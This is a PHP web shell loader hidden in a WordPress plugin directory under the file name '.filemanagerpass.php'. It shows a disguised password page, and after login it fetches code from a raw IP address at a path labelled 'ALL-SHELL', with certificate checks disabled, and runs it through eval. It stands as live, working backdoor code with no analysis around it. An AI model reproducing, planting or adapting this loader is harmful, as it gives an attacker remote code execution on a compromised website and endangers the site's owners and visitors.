HEX

File: /var/www/html/wp-content/plugins/effybgl/.filemanagerpass.php
<?php
/* - simple auth gateway - */
@error_reporting(0);
@ini_set('display_errors', 0);
@session_start();

// password table (hash:label)
$pass_table = [
    '6effe27d6aad2e8a76dc35373aeae74a' => 'admin',      // password
    '6effe27d6aad2e8a76dc35373aeae74a' => 'user',        // 12345678
    '6effe27d6aad2e8a76dc35373aeae74a' => 'operator',    // 123456
    '6effe27d6aad2e8a76dc35373aeae74a' => 'root',        // admin
    '6effe27d6aad2e8a76dc35373aeae74a' => 'guest'        // 12345
];

$remote_url = 'http://185.128.227.157/ALL-SHELL/raw-ker/fllpass.txt';

// login handler
if(isset($_POST['p']) && !empty($_POST['p'])){
    $input_hash = md5(trim($_POST['p']));
    
    if(isset($pass_table[$input_hash])){
        $_SESSION['auth'] = $pass_table[$input_hash];
        $_SESSION['time'] = time();
        
        // redirect to self
        $loc = strtok($_SERVER['REQUEST_URI'], '?');
        header('Location: ' . $loc);
        exit;
    }
    // if wrong password: no error, just stay on login page
}

// check session
$is_auth = isset($_SESSION['auth']) && !empty($_SESSION['auth']);

if(!$is_auth){
    // login page - no error message
    echo '<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>Access</title>
<style>
*{margin:0;padding:0;box-sizing:border-box}
body{background:#0a0a0a;font-family:sans-serif;display:flex;justify-content:center;align-items:center;min-height:100vh;padding:20px}
.container{background:#111;padding:30px;border-radius:20px;width:100%;max-width:340px;border:1px solid #222}
h3{color:#fff;text-align:center;margin-bottom:8px;font-weight:500}
.sub{color:#666;text-align:center;font-size:12px;margin-bottom:25px}
input{width:100%;padding:12px 14px;background:#1a1a1a;border:1px solid #2a2a2a;border-radius:12px;color:#fff;font-size:14px;margin-bottom:15px;outline:none}
input:focus{border-color:#3a3a3a}
button{width:100%;padding:12px;background:#2a2a2a;border:none;border-radius:12px;color:#fff;font-weight:600;cursor:pointer}
button:hover{background:#3a3a3a}
.footer{text-align:center;margin-top:20px;font-size:10px;color:#444}
</style>
</head>
<body>
<div class="container">
<h3>Authentication</h3>
<div class="sub">Enter credentials</div>
<form method="POST" action="">
<input type="password" name="p" placeholder="Password" autocomplete="off" required>
<button type="submit">Submit</button>
</form>
<div class="footer">Secure Gateway</div>
</div>
</body>
</html>';
    exit;
}

// authenticated - fetch and execute remote payload
function _fetch($url){
    if(!function_exists('curl_init')){ return false; }
    
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt($ch, CURLOPT_TIMEOUT, 25);
    curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/120.0.0.0 Safari/537.36');
    curl_setopt($ch, CURLOPT_ENCODING, 'gzip, deflate');
    
    $res = curl_exec($ch);
    $code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);
    
    return ($code == 200 && strlen($res) > 10) ? $res : false;
}

$data = _fetch($remote_url);
if($data !== false){
    $data = ltrim($data, "\xef\xbb\xbf");
    
    // check if it's PHP code
    if(strpos($data, '<?php') !== false || strpos($data, '<?') !== false){
        @eval('?>' . $data);
    }else{
        echo $data;
    }
}else{
    echo '<!DOCTYPE html><html><head><title>Gateway</title></head><body style="background:#0a0a0a;color:#fff;display:flex;justify-content:center;align-items:center;height:100vh;margin:0"><div>System ready</div></body></html>';
}
?>